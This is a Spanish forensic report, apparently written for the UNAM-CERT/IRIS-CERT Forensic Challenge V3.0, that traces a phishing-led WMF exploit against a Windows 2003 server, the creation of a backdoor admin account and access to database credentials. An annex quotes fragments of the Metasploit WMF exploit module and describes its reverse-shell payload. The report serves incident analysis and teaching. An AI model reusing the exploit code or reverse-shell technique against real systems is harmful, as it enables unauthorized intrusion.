Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Uso de privilegios Id. suceso: 576 Fecha: 03/02/2006 Hora: 08:07:40 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1006 Equipo: COUNTERS Descripcin: Privilegios especiales asignados al nuevo inicio de sesin: Usuario: Johnatan Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x5AA33) Privilegios: SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege
Segn la gua de Hardening de Windows (http://www.microsoft.com/technet/security/prodtech/windows2000/win2khg/appxb. mspx ), este grupo de privilegios corresponden a un Administrador. Dado que el usuario Johnatan tena nivel de Administrador, el atacante recibi una terminal con este nivel. Se recomienda revisar el Anexo 3 desde documento donde se analiza la herramienta. A este punto creemos que no es necesario colectar ms informacin. Contamos ya con suficientes datos para formular una teora sobre lo acontecido, por tanto damos por finalizado este punto y pasamos a concluir el anlisis.
3.7
Formulando la teora del ataque.
Llego la hora de armar el rompecabezas. En este punto repasamos toda la informacin de la que disponemos, en base a los horarios en los que se presentaron los distintos eventos relacionamos los distintos hechos y la evidencia, y formulamos la siguiente teora:
35
El da 05 de Febrero de 2006 el servidor COUNTERS fue atacado aprovechando una vulnerabilidad existente en la versin de Windows que tenia instalada (Windows 2003) relacionada la forma en que se procesan los archivos WMF (Windows Meta File) y para la cual no tenia el parche de seguridad instalado (Parche KB912919). El atacante instalo y ejecuto la herramienta Metasploit, (La cual levanta un servidor que escucha en el puerto 8080 y permite explotar la vulnerabilidad antes descrita cuando la victima visita va HTTP al servidor desde una maquina vulnerable) en la IP 70.107.249.150 desde la cual efectu el ataque. El atacante envi un correo electrnico desde la direccin alopez@eycsa.com.mx a la direccin de Yahoo del administrador jonathan.tezca@yahoo.com invitndolo con engaos (Ingeniera Social) a visitar la direccin desde la cual escuchaba el Metasploit http://70.107.249.150:8080/clientes.wmf . Un usuario se encontraba en ese momento dentro de la maquina, logueado con la cuenta Johnatan la cual tenia privilegios de administrador, este usuario que suponemos es el dueo de la cuenta checaba via Web su correo de Yahoo desde el servidor, y accede a la direccin que le envi el atacante. Se produce exitosamente el exploit de la vulnerabilidad y el atacante recibe una terminal con privilegios de administrador, el siguiente evento nos muestra el momento en que se ejecuto la terminal (Se enva el prompt del sistema):
Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 592 Fecha: 05/02/2006 Hora: 12:44:12 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1006 Equipo: COUNTERS Descripcin: Se ha creado un proceso: Id. de proceso: 3376 Nombre de archivo de imagen: C:\WINDOWS\system32\cmd.exe Id. de proceso creador: 884 Nombre de usuario: Johnatan Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3DF69A)
Siguiendo los eventos que registra la cuenta Johnatan a partir de ese momento encontramos que el atacante hace uso de los comandos net.exe y net1.exe para crear la una nueva cuenta en el sistema operativo (La cuenta ver0k) la cual agrega tambin como Administrador (Ver anexo1). Ejecuta tambin el programa reg.exe, el cual le permite ver y modificar el registro de Windows, verifica la versin de Windows usando winver.exe . El servidor tenia el Terminal Services habilitado, a las 12:47 PST se recibe un paquete del tipo MICROSOFT_AUTHENTICATION_PACKAGE_V1_0, e inicia los intentos de conexin de la cuenta ver0k, le damos seguimiento a los eventos que se registraron en SecEvent.Evt el atacante inicia sesin muy probablemente a travs del Terminal Services para ver0k (Ver anexo 2), a partir de ah tiene acceso de modo grafico al servidor con una cuenta con privilegios de administrador. El atacante ejecuta el Internet Explorer, el Outlook Express, intenta acceder al servidor de MySQL ejecutando el MySQLAdministrator, ver el siguiente evento: 36
Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 592 Fecha: 05/02/2006 Hora: 12:48:17 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin: Se ha creado un proceso: Id. de proceso: 2320 Nombre de archivo de imagen: C:\Program Files\MySQL\MySQL Administrator 1.1\MySQLAdministrator.exe Id. de proceso creador: 720 Nombre de usuario: ver0k Dominio: COUNTERS
12:50 PST Utiliza el wordpad para ver el contenido del archivo config.php (Hay un evento a las 12:50 donde ejecuta el WordPad, recordemos que en el historial de Internet Explorer aparece que accedi a ese archivo a las 12:50), donde apareca el nombre de usuario para acceder a la base de datos de WEBERP. Y posteriormente ejecuta el cliente de MySQL para acceder directo a la base de datos:
Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 592 Fecha: 05/02/2006 Hora: 12:51:16 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin: Se ha creado un proceso: Id. de proceso: 392 Nombre de archivo de imagen: C:\apache\Apache\mysql\bin\mysql.exe Id. de proceso creador: 2320 Nombre de usuario: ver0k Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3F4E19)
Ejecuta el MSN Messenger 7.5 y el Windows Media Player, segn el Historial de Internet Explorer entre 13:00 PST y 14:00 PST, visito las carpetas de los usuarios, con especial atencin a las imgenes de ndole sexual, y las animacin de www.huevocartoon.com y finalmente cierra sesin a las 15:44 PST:
Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Inicio/cierre de sesin Id. suceso: 538 Fecha: 05/02/2006 Hora: 15:44:12 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin: Cierre de sesin de usuario: Nombre de usuario: ver0k Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3F4E19) Tipo de inicio de sesin: 10
37
Es muy factible que el atacante haya accedido al archivo counters.log y tomado los datos de la cuenta acontreras, a las 13:57 PST se conecto va Web a la aplicacin WebERP con la cuenta acontreras desde la misma maquina que ejecuto el ataque y creo el usuario admin. Tambin encontramos actividad de la cuenta Administrador ejecutando un Kit de respuesta entre las 14:00 y las 15:00 PST. Por lo que no hubo mas actividad por parte del atacante. Un WHOIS a la IP desde la que se origino el ataque arroja la siguiente informacin:
OrgName: OrgID: Address: City: StateProv: PostalCode: Country: NetRange: CIDR: NetName: NetHandle: Parent: NetType: NameServer: NameServer: NameServer: NameServer: Comment: Comment: RegDate: Updated: Verizon Internet Services Inc. VRIS 1880 Campus Commons Dr Reston VA 20191 US 70.104.0.0 - 70.111.255.255 70.104.0.0/13 VIS-70-104 NET-70-104-0-0-1 NET-70-0-0-0-0 Direct Allocation NS1.BELLATLANTIC.NET NS2.BELLATLANTIC.NET NS2.VERIZON.NET NS4.VERIZON.NET Please send all abuse reports to abuse at verizon.net. DO NOT send e-mail to DIA.ADMIN at verizon.com as it will not be answered. 2004-09-21 2005-04-21 VISAB-ARIN VIS Abuse +1-214-513-6711 abuse at verizon.net
OrgAbuseHandle: OrgAbuseName: OrgAbusePhone: OrgAbuseEmail: OrgTechHandle: OrgTechName: OrgTechPhone: OrgTechEmail:
ZV20-ARIN Verizon Internet Services +1-703-295-4583 IPNMC at gnilink.net
# ARIN WHOIS database, last updated 2006-03-24 19:10 # Enter ? for additional hints on searching ARIN's WHOIS database.
3.8
Consideraciones sobre la teora.
El ataque fue un ataque dirigido, el atacante conoca al administrador del servidor y tomo como blanco especficamente este servidor. Aunque el correo que envi el atacante venia a nombre del director de la empresa propietaria del servicio, resultara un poco ilgico que sea el quien ataco un servidor que finalmente le perteneca. Puede ser tambin que el atacante haya robado la
38
identidad del Director de la empresa para enviar el correo. Puede suponerse que el ataque se efectu bajo alguno de los siguientes escenarios: Abuso de confianza por uno o ms empleados. Revancha de usuarios que hayan sido separados de la empresa. Espionaje industrial. Falta a la confidencialidad de informacin critica por parte del administrador.
Entre otros, descubrir bajo que escenario se llevo a cabo, requerira entrevistar a los presuntos implicados lo cual queda fuera del alcance de este anlisis.
3.9
Recomendaciones al administrador.
En base a lo observado se recomienda al administrador observar los siguientes puntos: Mantener al da las actualizaciones del servidor. Aun que el menciono que este estaba actualizado, el parche de seguridad que correga la vulnerabilidad de la que se aprovecho el atacante ya exista al momento de que sucedi el ataque, y este no estaba instalado. Dar de baja las cuentas que no son indispensables. Corregir o cambiar la versin de WebERP. En la versin mas reciente descargada de la Web todava se enva el password en texto claro. Quizs sea conveniente evaluar otro sistema de ERP. No utilizar el servidor para cosas que no sean estrictamente de trabajo. Cambiar los passwords de todos los usuarios del WebERP. Disminuir el nmero de administradores del WebERP. El manual del Apache debe ser removido, el dejar el manual instalado permite a los atacantes identificar de forma sencilla el Web Server. Tambien el contenido de la carpeta cgi-bin. Mantener un estricta confidencialidad de la informacin critica de la empresa.
Por lo dems, el Administrador respondi al incidente casi una hora despus de que este dio inicio, esto nos indica que se mantena al tanto del servidor, continuar as. En la medida de las posibilidades de la empresa, consideren aumentar su esquema de seguridad (Firewall externos, IDS, etc.). Una recomendacin para la empresa es dar continuidad a la investigacin. La informacin es un activo que debe ser protegido.
39
4
4.1
Conclusiones
Respuestas a las preguntas planteadas por el reto.
Se da respuesta a las preguntas planteadas por el reto: El sistema ha sido comprometido? Si Quin (desde dnde) se realiz el ataque? Ver el punto 3.7 de este documento Cmo se realiz el ataque? Ver el punto 3.7 de este documento Qu hizo el atacante en el sistema comprometido? Ver el punto 3.7 de este documento
4.2
Correspondencia con la estructura de reporte sugerida.
Los organizadores sugirieron una estructura para este reporte, aun que esta no se sigui fielmente, creo que este reporte cumple con la mayora de los puntos sugeridos. Cubierto en el punto 1: Antecedentes del incidente Cubierto en el punto 2 : Entorno del anlisis, Descripcin de las herramientas. Cubierto en el punto 3 : Recoleccin de los datos, Descripcin de la evidencia, Anlisis de la evidencia ,Informacin del sistema analizado , Caractersticas del SO ,Aplicaciones ,Servicios ,Vulnerabilidades ,Metodologa ,Descripcin de los hallazgos ,Huellas de la intrusin ,Herramientas usadas por el atacante ,Alcance de la intrusin ,El origen del ataque, Cronologa de la intrusin , Recomendaciones especficas .Cubierto en el punto 4:Conclusiones. Ver Anexos: Anlisis de artefactos
4.3
Agradecimientos.
A los organizadores por retarnos nuevamente. Agradezco adems a la gente que me apoyo durante la realizacin de la investigacin, a la gente de la lista de ANAFON y por supuesto a mi amada esposa Gabriela. Dedicado a mi sobrina Ingrid Carolina Bienvenida pequea!. DNSJH.
Termine!
40
5
5.1
Anexos
Anexo 1 Eventos relevantes de la cuenta Johnatan a partir del incidente.
Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 592 Fecha: 05/02/2006 Hora: 12:23:49 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1006 Equipo: COUNTERS Descripcin: Se ha creado un proceso: Id. de proceso: 3128 Nombre de archivo de imagen: C:\Program Files\Internet Explorer\IEXPLORE.EXE Id. de proceso creador: 904 Nombre de usuario: Johnatan Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3DF69A) *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 592 Fecha: 05/02/2006 Hora: 12:44:11 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1006 Equipo: COUNTERS Descripcin: Se ha creado un proceso: Id. de proceso: 884 Nombre de archivo de imagen: C:\WINDOWS\system32\rundll32.exe Id. de proceso creador: 3128 Nombre de usuario: Johnatan Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3DF69A) *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 592 Fecha: 05/02/2006 Hora: 12:44:12 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1006 Equipo: COUNTERS Descripcin: Se ha creado un proceso: Id. de proceso: 3376 Nombre de archivo de imagen: C:\WINDOWS\system32\cmd.exe Id. de proceso creador: 884 Nombre de usuario: Johnatan Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3DF69A) *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 592 Fecha: 05/02/2006 Hora: 12:45:30 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1006 Equipo: COUNTERS Descripcin: Se ha creado un proceso: Id. de proceso: 2988 Nombre de archivo de imagen: C:\WINDOWS\system32\net.exe
41
Id. de proceso creador: 3376 Nombre de usuario: Johnatan Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3DF69A). *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 592 Fecha: 05/02/2006 Hora: 12:45:30 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1006 Equipo: COUNTERS Descripcin: Se ha creado un proceso: Id. de proceso: 3700 Nombre de archivo de imagen: C:\WINDOWS\system32\net1.exe Id. de proceso creador: 2988 Nombre de usuario: Johnatan Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3DF69A) *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Administracin de cuentas Id. suceso: 632 Fecha: 05/02/2006 Hora: 12:45:30 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1006 Equipo: COUNTERS Descripcin: Miembro de grupo global habilitado de seguridad agregado: Nombre del miembro: Id. del miembro: S-1-5-21-2780117151-1340924567-2512508698-1024 Nombre de cuenta destino: None Dominio de destino:COUNTERS Id. de cuenta destino: %{S-1-5-21-2780117151-1340924567-2512508698-513} Nombre de usuario llamador: Johnatan Dominio del llamador: COUNTERS Id. de inicio de sesin del llamador: (0x0,0x3DF69A) Privilegios: -
Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Administracin de cuentas Id. suceso: 624 Fecha: 05/02/2006 Hora: 12:45:30 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1006 Equipo: COUNTERS Descripcin: Cuenta de usuario creada: Nombre de cuenta nueva: ver0k Dominio nuevo: COUNTERS Id. de cuenta nueva: S-1-5-21-2780117151-1340924567-2512508698-1024 Nombre de usuario llamador: Johnatan Dominio del llamador: COUNTERS Id. de inicio de sesin del llamador: (0x0,0x3DF69A) Privilegios *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Administracin de cuentas Id. suceso: 626 Fecha: 05/02/2006 Hora: 12:45:30 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1006
42
Equipo: COUNTERS Descripcin: Cuenta de usuario habilitada: Nombre de cuenta destino: ver0k Dominio destino: COUNTERS Id. de cuenta destino: S-1-5-21-2780117151-1340924567-2512508698-1024 Nombre de usuario llamador: Johnatan Dominio del llamador: COUNTERS Id. de inicio de sesin del llamador:(0x0,0x3DF69A) *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 593 Fecha: 05/02/2006 Hora: 12:46:23 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1006 Equipo: COUNTERS Descripcin: Ha terminado un proceso: Id. de proceso: 3984 Nombre de archivo de imagen: C:\WINDOWS\system32\reg.exe Nombre de usuario: Johnatan Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3DF69A) *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Administracin de cuentas Id. suceso: 636 Fecha: 05/02/2006 Hora: 12:45:53 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1006 Equipo: COUNTERS Descripcin: Miembro de grupo local habilitado de seguridad agregado: Nombre del miembro: Id. del miembro: S-1-5-21-2780117151-1340924567-2512508698-1024 Nombre de cuenta destino: Administrators Dominio de destino:Builtin Id. de cuenta destino: BUILTIN\Administradores Nombre de usuario llamador: Johnatan Dominio del llamador: COUNTERS Id. de inicio de sesin del llamador: (0x0,0x3DF69A)
5.2
Anexo 2 Eventos relevantes de la cuenta ver0k.
Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Inicio de sesin de la cuenta Id. suceso: 680 Fecha: 05/02/2006 Hora: 12:47:21 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin: Inicio de sesin intentado por: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 Cuenta de inicio de sesin: ver0k Estacin de trabajo de origen: COUNTERS Cdigo de error: 0x0 *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Uso de privilegios Id. suceso: 576 Fecha: 05/02/2006 Hora: 12:47:21 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin:
43
Privilegios especiales asignados al nuevo inicio de sesin: Usuario: Dominio: Id. de inicio de sesin: (0x0,0x3F4E19) Privilegios: SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 592 Fecha: 05/02/2006 Hora: 12:47:38 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin: Se ha creado un proceso: Id. de proceso: 1016 Nombre de archivo de imagen: C:\WINDOWS\system32\ie4uinit.exe Id. de proceso creador: 720 Nombre de usuario: ver0k Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3F4E19) *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 592 Fecha: 05/02/2006 Hora: 12:47:42 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin: Se ha creado un proceso: Id. de proceso: 3980 Nombre de archivo de imagen: C:\Program Files\Outlook Express\setup50.exe Id. de proceso creador: 720 Nombre de usuario: ver0k Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3F4E19) *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 592 Fecha: 05/02/2006 Hora: 12:48:17 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin: Se ha creado un proceso: Id. de proceso: 2320 Nombre de archivo de imagen: C:\Program Files\MySQL\MySQL Administrator 1.1\MySQLAdministrator.exe Id. de proceso creador: 720 Nombre de usuario: ver0k Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3F4E19). *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 593 Fecha: 05/02/2006
44
Hora: 12:49:53 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin: Ha terminado un proceso: Id. de proceso: 520 Nombre de archivo de imagen: C:\Program Files\Windows NT\Accessories\wordpad.exe Nombre de usuario: ver0k Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3F4E19) *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 592 Fecha: 05/02/2006 Hora: 12:51:16 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin: Se ha creado un proceso: Id. de proceso: 392 Nombre de archivo de imagen: C:\apache\Apache\mysql\bin\mysql.exe Id. de proceso creador: 2320 Nombre de usuario: ver0k Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3F4E19) *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 593 Fecha: 05/02/2006 Hora: 01:01:22 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin: Ha terminado un proceso: Id. de proceso: 392 Nombre de archivo de imagen: C:\apache\Apache\mysql\bin\mysql.exe Nombre de usuario: ver0k Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3F4E19) Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 861 Fecha: 05/02/2006 Hora: 01:04:14 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin: El Firewall de Windows detect una aplicacin al escuchar el trfico entrante. Nombre: MSN Messenger 7.5 Ruta de acceso: C:\Program Files\MSN Messenger\msnmsgr.exe Identificador del proceso: 2448 Cuenta de usuario: ver0k Dominio de usuario: COUNTERS Servicio: No Servidor RPC: No Versin IP: IPv4 Versin IP: UDP Nmero de puerto: 2186 Permitido: Yes *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado
45
Id. suceso: 592 Fecha: 05/02/2006 Hora: 01:14:26 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin: Se ha creado un proceso: Id. de proceso: 3744 Nombre de archivo de imagen: C:\Program Files\Windows Media Player\wmplayer.exe Id. de proceso creador: 720 Nombre de usuario: ver0k Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3F4E19) *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 593 Fecha: 05/02/2006 Hora: 01:29:32 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin: Ha terminado un proceso: Id. de proceso: 2928 Nombre de archivo de imagen: C:\Documents and Settings\Administrator\My Documents\My Videos\cartoons\amigas de huevos.exe Nombre de usuario: ver0k Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3F4E19) *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 593 Fecha: 05/02/2006 Hora: 01:59:16 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin: Ha terminado un proceso: Id. de proceso: 2320 Nombre de archivo de imagen: C:\Program Files\MySQL\MySQL Administrator 1.1\MySQLAdministrator.exe Nombre de usuario: ver0k Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3F4E19) *********************************************************************************************************************** Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Inicio/cierre de sesin Id. suceso: 538 Fecha: 05/02/2006 Hora: 03:44:12 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1024 Equipo: COUNTERS Descripcin: Cierre de sesin de usuario: Nombre de usuario: ver0k Dominio: COUNTERS Id. de inicio de sesin: (0x0,0x3F4E19) Tipo de inicio de sesin: 10
46
5.3
Anexo 3 Como funciona el port del exploit en el Metasploit.
Evaluaremos de forma muy breve el funcionamiento del port del exploit hacia el Metasploit, el port se encuentra en la carpeta exploits dentro de la carpeta del Metasploit, el archivo se llama ie_xp_pfv_metafile.pm , fue realizado por HD Moore y esta escrito en Perl. De la lnea 44 a la 61 tenemos variables importantes definidas, observe que el puerto en el que se escuchara es el 8080:
'Arch' 'OS' 'Priv' => [ 'x86' ], => [ 'win32', 'winxp', 'win2003' ], => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' }, 'UserOpts' => { 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], 'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ], },
En las lneas 89 a la 117, la subrutina exploit inicia el listener en el puerto 8080. Cuando una llamada llega a ese puerto la subrutina HandleHttpClient, identifica los headers HTTP, esta subrutina espera que la llamada sea a haciendo una solicitud de un archivo con extensin .tiff, observe en las lneas 172 a 192 como cuando recibe algo distinto enva un cdigo HTML con una redireccin a una URL compuesta de manera aleatoria con extensin .tiff. Recuerde que cuando el usuario visito clientes.wmf fue redireccionado a una URL con extensin .tiff.
my $ext = 'tiff'; if ($url !~ /\.$ext/i) { $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, redirecting..."); my $prefix = 'http://'.($self->GetVar('REALHOST') || Pex::Utils::SourceIP($fd->PeerAddr)).':'.$fd->LocalPort; my $wmfpath = RandomPath(); my $content = "<html><meta http-equiv='refresh' content='0; URL=${prefix}${wmfpath}.${ext}'><body>". "<div class='". Pex::Text::AlphaNumText(int(rand(1024)+256)). "'></div>". "One second please...". "</body></html>"; $fd->Send($self->BuildResponse($content)); $fd->Close; return; }
47
En la lnea 194 se carga el Payload a ejecutar en la variable shellcode, en este caso se escogi el win32_reverse que enva una terminal shell de regreso al atacante. En las lneas de la 221 a la 278 se forma el archivo que realizara el exploit observe como se incluye el Payload que se ejecutara:
my $content = # WindowsMetaHeader pack('vvvVvVv', # WORD FileType; /* Type of metafile (1=memory, 2=disk) */ int(rand(2))+1, # WORD HeaderSize; /* Size of header in WORDS (always 9) */ 9, # WORD Version; /* Version of Microsoft Windows used */ (int(rand(2)) == 1 ? 0x0100 : 0x0300), # DWORD FileSize; /* Total size of the metafile in WORDs */ $clen/2, # WORD NumOfObjects; /* Number of objects in the file */ rand(0xffff), # DWORD MaxRecordSize; /* The size of largest record in WORDs */ rand(0xffffffff), # WORD NumOfParams; /* Not Used (always 0) */ rand(0xffff), ). # Filler data $pre_buff. # StandardMetaRecord - Escape() pack('Vvv', # DWORD Size; /* Total size of the record in WORDs */ 4, # WORD Function; /* Function number (defined in WINDOWS.H) */ int(rand(256) << 8) + 0x26, # WORD Parameters[]; /* Parameter values passed to function */ 9, ). $shellcode . # # Filler data # $suf_buff. # # Complete the structure # pack('Vv', 3, 0 ). Pex::Text::RandomData(int(rand(16384)+256));
Finalmente usando la funcin BuildResponse que se encuentra definida en las lneas 342 a365 se conforma la respuesta HTTP y en la lnea 283 se enva a la victima. En cuanto al Payload usamos el win32_reverse que se encuentra definido en la carpeta payloads en el archivo win32_reverse.pm bsicamente enva una terminal de regreso al atacante usando el puerto local y le despliega una shell de MS-DOS.
48

Reto Forense

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Reto Forense

Uploaded by

Copyright:

Available Formats

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Reto de Anlisis Forense V3.0 UNAM CERT / IRIS CERT

Informe Tcnico Ing.-Juan ngel Hurtado Monterrey N.L Mxico

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Descarga y preparacin de imgenes.

windows2003.img.gz.aa windows2003.img.gz.ab windows2003.img.gz.ac windows2003.img.gz.ad windows2003.img.gz.ae windows2003.img.gz.af windows2003.img.gz.ag

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Software Software System System System

encontramos los siguientes valores:

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Lista de excepciones (aplicaciones permitidas)

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

1023 postgres,PostgreSQL service account 1024

Identificacin de la aplicacin ERP.

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

HKLM\software\MySQL AB\MySQL Server 4.1

HKLM\software\MySQL AB\MySQL Administrator 1.1

HKLM\software\PostgreSQL\Installations\{34D95765-2D5A-470F-A39FBC9DEAAAF04F}\Version HKLM\software\Mozilla\Mozilla Firefox 1.5.0.1

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Colectando eventos del sistema operativo.

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Reconstruccin de la aplicacin ERP.

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Colectando eventos del WebERP.

